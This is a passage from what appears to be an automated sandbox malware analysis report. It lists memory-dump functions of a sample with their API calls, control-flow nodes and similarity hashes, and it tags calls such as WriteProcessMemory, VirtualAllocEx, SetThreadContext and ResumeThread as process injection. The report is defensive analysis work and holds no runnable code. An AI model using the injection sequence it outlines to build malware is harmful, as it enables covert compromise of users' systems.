                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 133c595957d385cf10e26f6c5d0826cb131f87b5160d511cbea19d79343de973
                                                                          • Instruction ID: 00d3c9d1ecc835efb9babd03ddef171afcecb02e737aa208d59e1d00622eccf2
                                                                          • Opcode Fuzzy Hash: 133c595957d385cf10e26f6c5d0826cb131f87b5160d511cbea19d79343de973
                                                                          • Instruction Fuzzy Hash: E641C2B1D00309DFDB14CF9AD884AEEBBB5BF88314F24812EE819AB210D7749945CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C6FA58 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 393 2c6fa58-2c6fabe 394 2c6fac0-2c6fac6 393->394 395 2c6fac9-2c6fad0 393->395 394->395 396 2c6fad2-2c6fad8 395->396 397 2c6fadb-2c6fb7a CreateWindowExW 395->397 396->397 399 2c6fb83-2c6fbbb 397->399 400 2c6fb7c-2c6fb82 397->400 404 2c6fbbd-2c6fbc0 399->404 405 2c6fbc8 399->405 400->399 404->405 406 2c6fbc9 405->406 406->406
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C6FB6A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: eb5e10b359c2871e4e1160e8f552a709aae166936ebbd453848cb73474396f7d
                                                                          • Instruction ID: a94843b4150b9a3e9cde7645b0ede6bcbb3057ed2d37ff9a919bc551e9310279
                                                                          • Opcode Fuzzy Hash: eb5e10b359c2871e4e1160e8f552a709aae166936ebbd453848cb73474396f7d
                                                                          • Instruction Fuzzy Hash: 3341CFB1D00309DFDB14CF9AD884ADEBBB5BF88314F24812AE819AB210D7749945CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF3820 Relevance: 1.6, APIs: 1, Instructions: 66injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 407 4cf3820-4cf3879 409 4cf387b-4cf3887 407->409 410 4cf3889-4cf38c2 WriteProcessMemory 407->410 409->410 411 4cf38cb-4cf38ec 410->411 412 4cf38c4-4cf38ca 410->412 412->411
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04CF38B5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 707f627cea93314893edf595305cf749f6715c86f6be2d6c4c8f2e440d7e6711
                                                                          • Instruction ID: 293e71fb382dfbceaeadef4ede8100ae242d706891f19cfc4b271d8b43738a60
                                                                          • Opcode Fuzzy Hash: 707f627cea93314893edf595305cf749f6715c86f6be2d6c4c8f2e440d7e6711
                                                                          • Instruction Fuzzy Hash: 802103B5900259DFCB10CF9AC985BDEBBF5FF48314F10842AE918A3350D378A944CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF3828 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 414 4cf3828-4cf3879 416 4cf387b-4cf3887 414->416 417 4cf3889-4cf38c2 WriteProcessMemory 414->417 416->417 418 4cf38cb-4cf38ec 417->418 419 4cf38c4-4cf38ca 417->419 419->418
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04CF38B5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 80bbafe89dbdaeca1bf1c2ad737dbf502b7c792e303b5e8c05dbcbb9e84476ae
                                                                          • Instruction ID: dd59668eb58a1cd4819698cf0f86fe1ca832e80a79dd0181ee94f63d792cb590
                                                                          • Opcode Fuzzy Hash: 80bbafe89dbdaeca1bf1c2ad737dbf502b7c792e303b5e8c05dbcbb9e84476ae
                                                                          • Instruction Fuzzy Hash: 892114B1900299DFCB10CF9AC884BDEBBF4FF48314F50842AE918A3350D778A944CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF35E8 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 421 4cf35e8-4cf35e9 422 4cf35eb-4cf363c 421->422 423 4cf366a-4cf3674 421->423 429 4cf363e-4cf3646 422->429 430 4cf3648-4cf3669 SetThreadContext 422->430 425 4cf367d-4cf369e 423->425 426 4cf3676-4cf367c 423->426 426->425 429->430 430->423
                                                                          APIs
                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 04CF3667
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: bae5ee883215868f22480a193375683641f80e7a2ce6c7b30ed62b7584d3ae13
                                                                          • Instruction ID: fb1852ece6c83d760e86d38178ca581e163e9741235e3a4f0241a790acd5a4f4
                                                                          • Opcode Fuzzy Hash: bae5ee883215868f22480a193375683641f80e7a2ce6c7b30ed62b7584d3ae13
                                                                          • Instruction Fuzzy Hash: 3B2129B1D002599BCB10CF9AC88579EFBF4BB49224F54812AE918B7341D778A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C6BB59 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C6BBE7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 957e62fec079b5029329287422b063b4d8a5f8bab8fee90260905043ee15ee07
                                                                          • Instruction ID: 8df767b7dee44b6456ff8fca140988e9fdf566c2f96efc0716838189e2df06f1
                                                                          • Opcode Fuzzy Hash: 957e62fec079b5029329287422b063b4d8a5f8bab8fee90260905043ee15ee07
                                                                          • Instruction Fuzzy Hash: 7521E3B5900249DFDB10CFAAD984AEEBBF8BF48324F14845AE954B3311C374A954CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C6BB60 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C6BBE7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 1a61e1d6380a04ac8928b3c03ec0e44458f24dbf0f0483b19b78413af5b19678
                                                                          • Instruction ID: 5de4eee57134403891f908739d7c59cb1cc68c1717aa7ef460ea2697dae0df66
                                                                          • Opcode Fuzzy Hash: 1a61e1d6380a04ac8928b3c03ec0e44458f24dbf0f0483b19b78413af5b19678
                                                                          • Instruction Fuzzy Hash: 8021E4B5900249DFDB10CFAAD984AEEBBF8EB48324F14801AE914A3310C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF36AB Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04CF372F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 1a0d027460969c548664254e5bc4fdb5224ec377ae8c59200b0c23aea00ca5c3
                                                                          • Instruction ID: d9e4d8b341a262e6cdcbf8907b0481c714be26445752b3485678a03476154368
                                                                          • Opcode Fuzzy Hash: 1a0d027460969c548664254e5bc4fdb5224ec377ae8c59200b0c23aea00ca5c3
                                                                          • Instruction Fuzzy Hash: 8F2102B5900659DFCB10CF9AC884BDEBBF4FB48320F14842AE918A7351D338A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF36B0 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04CF372F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 7c8888e926acf8606c89f76336e9e31d1165f17e241ec7907cf1f5a732134b3c
                                                                          • Instruction ID: 8ee430ffadac2c653eb4345b87fda0ab346ea2d44e27c85346f374c9bf8f2fc8
                                                                          • Opcode Fuzzy Hash: 7c8888e926acf8606c89f76336e9e31d1165f17e241ec7907cf1f5a732134b3c
                                                                          • Instruction Fuzzy Hash: 2A21E2B5900659DFCB10CF9AD884BDEBBF4FB48320F10842AE918A7251D378A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF35F0 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 04CF3667
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: 194a67fbc7cf58c0bb2ea981bab561b3cac9b08192d40f4eb6af93bce4c71ef5
                                                                          • Instruction ID: 2ab2e9350ee1f20552950c813055ff2ff26459bed1f94f30cf7ad9e48f5caf44
                                                                          • Opcode Fuzzy Hash: 194a67fbc7cf58c0bb2ea981bab561b3cac9b08192d40f4eb6af93bce4c71ef5
                                                                          • Instruction Fuzzy Hash: 6F2108B1D006599FCB10CF9AC8457DEFBF4BB48624F54812AE918B7341D778A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0736BD58 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0736BDCB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.381718648.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7360000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 1346a7f4d61bebaecb9448e9bd5ae0bb9a283ed45081561ed14a6832882bd4f1
                                                                          • Instruction ID: 5270e62e13be913b5831017e187d1036a81790728ffba16b039267b2d1ab1d8c
                                                                          • Opcode Fuzzy Hash: 1346a7f4d61bebaecb9448e9bd5ae0bb9a283ed45081561ed14a6832882bd4f1
                                                                          • Instruction Fuzzy Hash: 502114B19002599FCB10CF9AC884BDEFBF8FF48320F10842AE958A7241D378A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C69180 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C697F1,00000800,00000000,00000000), ref: 02C69A02
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: df6db251e529807554ede8c15b5d937d763641cafd96565f85e4dcb0b576b24c
                                                                          • Instruction ID: 26bb0eab99bd00d87fa40e06f7ff1e35f33faea0f83685f4cc40a553cd6d9ac2
                                                                          • Opcode Fuzzy Hash: df6db251e529807554ede8c15b5d937d763641cafd96565f85e4dcb0b576b24c
                                                                          • Instruction Fuzzy Hash: 641114B2D002498FCB10DF9AC488BEEFBF4EB88364F15842EE419A7201C375A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C69990 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C697F1,00000800,00000000,00000000), ref: 02C69A02
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 253d7d2f2f72a5fb9c4d73afbd116326d0be06d05dc2038b309b059d7ee6ea15
                                                                          • Instruction ID: d849eca6045b9816c210c7e875a0a55bf501c0229e4502dcd77d40b65c09eb6c
                                                                          • Opcode Fuzzy Hash: 253d7d2f2f72a5fb9c4d73afbd116326d0be06d05dc2038b309b059d7ee6ea15
                                                                          • Instruction Fuzzy Hash: B11103B29002498FCB10CFAAD484AEEFBF4AF88324F15846EE419A7601C775A545CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF3988 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 088d5a3678c4c8ecc2d121d9c98b69501c6c94285a122406db5c8d94d351b59b
                                                                          • Instruction ID: 0d8dee674927d497927e6f4631106726ddc994bccaa1ae3df3c44a166fe89b3f
                                                                          • Opcode Fuzzy Hash: 088d5a3678c4c8ecc2d121d9c98b69501c6c94285a122406db5c8d94d351b59b
                                                                          • Instruction Fuzzy Hash: A2113AB1D00248DFDB50DFA9D88579EBBF4EF48314F1484AAD919A3351E738AA44CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF3778 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04CF37EB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: aa33d709e8d382e45490ca335e505b3884596e1a5030a3b97e4eb35abe504fdd
                                                                          • Instruction ID: 7dfcecb2d86e203f68e6731d8ebaf546a12dfbf199bd04516477d9cdcfd0f629
                                                                          • Opcode Fuzzy Hash: aa33d709e8d382e45490ca335e505b3884596e1a5030a3b97e4eb35abe504fdd
                                                                          • Instruction Fuzzy Hash: 5D1134B5800289DFCB10CF9AC884BDEBFF4FB48320F24841AE919A7210C339A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF3780 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04CF37EB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: e84e2ebf2b8945ce86011c4f6dea399fd5178e4bfe12f50241a6b9bb0eaefecc
                                                                          • Instruction ID: 8a702b764d467547f10cc09415a5559aec25eb4098ae8968f1eb233e7a8f3b0f
                                                                          • Opcode Fuzzy Hash: e84e2ebf2b8945ce86011c4f6dea399fd5178e4bfe12f50241a6b9bb0eaefecc
                                                                          • Instruction Fuzzy Hash: 1E11F8B5900649DFCB10DF9AD884BDEBFF4FB48324F24841AE519A7250C375A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C69710 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02C69776
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: e880ec5ea69d3f8df1eb443c6fd586099ae2e4c789cc013dc67d256bf744922c
                                                                          • Instruction ID: 50a2f6701f9e5e714f241a3ca97f0d42678cfa3c2c66c7f9e3e556639732143c
                                                                          • Opcode Fuzzy Hash: e880ec5ea69d3f8df1eb443c6fd586099ae2e4c789cc013dc67d256bf744922c
                                                                          • Instruction Fuzzy Hash: 5D1110B5D002498FCB10CF9AC488BDEFBF8AF88224F14852AD829B7200C374A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF3CFB Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 04CF3D5D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: daab80a79bdd8a8f9a756b24295dbf4edb8463525a78d1b3a8bad84feb66d449
                                                                          • Instruction ID: 605fd0acea17aba792fabf117472aca32a0d55b6ff35565236357afefd13b16e
                                                                          • Opcode Fuzzy Hash: daab80a79bdd8a8f9a756b24295dbf4edb8463525a78d1b3a8bad84feb66d449
                                                                          • Instruction Fuzzy Hash: 5C11C2B59002499FDB10DF9AD885BDEBBF8EB48324F14841AE959A7211C374A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C6FCA0 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,?,?), ref: 02C6FCFD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow
                                                                          • String ID:
                                                                          • API String ID: 1378638983-0
                                                                          • Opcode ID: e7c68b401da9fecf64231c37c7269b637dd901da067aef506213df3b5570c0d1
                                                                          • Instruction ID: b2aa343bcfed3b821ad97f9e360fa4e3d69b4a80991f25a319066cbeb2c66700
                                                                          • Opcode Fuzzy Hash: e7c68b401da9fecf64231c37c7269b637dd901da067aef506213df3b5570c0d1
                                                                          • Instruction Fuzzy Hash: F51106B59002499FDB10DF9AD484BDEBBF8EB48324F20841AE815A7701C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF39DB Relevance: 1.5, APIs: 1, Instructions: 44threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 0333b8f278ea4385645473b76d22498a7ef8049f092d7122a7f3b8e48ca7b751
                                                                          • Instruction ID: 9e5bdaf2aad886264af5e3b17f2fa7ab00084f7ff3e08bf8f8377830f4930654
                                                                          • Opcode Fuzzy Hash: 0333b8f278ea4385645473b76d22498a7ef8049f092d7122a7f3b8e48ca7b751
                                                                          • Instruction Fuzzy Hash: 181115B1800249CFCB10DF9AD884BDEBBF8EB48324F24841AD519A7351C774A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF3D00 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 04CF3D5D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 9e404b29702e2d21523e2be14ca896bfc95c7598e41639a6c30a49a1d2a3a6ea
                                                                          • Instruction ID: 778cc6d7b701114962b41595fc18aeb2bc860bfcdbd90bac12ec823b40a420fe
                                                                          • Opcode Fuzzy Hash: 9e404b29702e2d21523e2be14ca896bfc95c7598e41639a6c30a49a1d2a3a6ea
                                                                          • Instruction Fuzzy Hash: F111D3B5800249DFDB10DF9AD884BDEBBF8EB48324F14841AE959A7211C374A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C6FC9B Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,?,?), ref: 02C6FCFD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow
                                                                          • String ID:
                                                                          • API String ID: 1378638983-0
                                                                          • Opcode ID: 84e565e380bb32fb2c4ad6a6cab1d6547caffc3e7fc1e6f5e0e1aa38420e0e3f
                                                                          • Instruction ID: bf20b0ea16d24cb5b7a132f944affba6f7b885ef1afd6c7a3e91f677e5a95729
                                                                          • Opcode Fuzzy Hash: 84e565e380bb32fb2c4ad6a6cab1d6547caffc3e7fc1e6f5e0e1aa38420e0e3f
                                                                          • Instruction Fuzzy Hash: 571145B5800249CFDB10CF99D585BEEBBF4EB48324F20854AE859A7300C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF39E0 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: efdcde08f23b4c39069f89edc892b15e5ce294b4cdc87a6d0338a9e0aa7889be
                                                                          • Instruction ID: 3fa3b370804a1664335f1f28a6471d82e4231f4b06205b502cf9b4412e80c9de
                                                                          • Opcode Fuzzy Hash: efdcde08f23b4c39069f89edc892b15e5ce294b4cdc87a6d0338a9e0aa7889be
                                                                          • Instruction Fuzzy Hash: C71127B1800249CFCB10DF9AD844BDEFBF8EB48324F20841AD519A7310C774A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0113D4A0 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372286511.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_113d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 22367060849f3af6c99fad811028324cca91435d2c6348da47b17d1e9b8795ac
                                                                          • Instruction ID: 6a7fa838e59fa44ad8a13975b7554790ff3e30b670a037aa4c0c60b60ba60852
                                                                          • Opcode Fuzzy Hash: 22367060849f3af6c99fad811028324cca91435d2c6348da47b17d1e9b8795ac
                                                                          • Instruction Fuzzy Hash: F52128B1504240DFDF09DF54E8C0B66BF75FBC4328F658569E9064B28AC336D855C7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0125D1D4 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.372406311.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_125d000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a1df2f515d8a16e735fb653fe76be4c3a743972be6752b09966c170ad21d6d7e
                                                                          • Instruction ID: e77bd028dc89fbee7d3dae870e8286935dd258dbe1f35c32dfbcf46f079bbc00
                                                                          • Opcode Fuzzy Hash: a1df2f515d8a16e735fb653fe76be4c3a743972be6752b09966c170ad21d6d7e
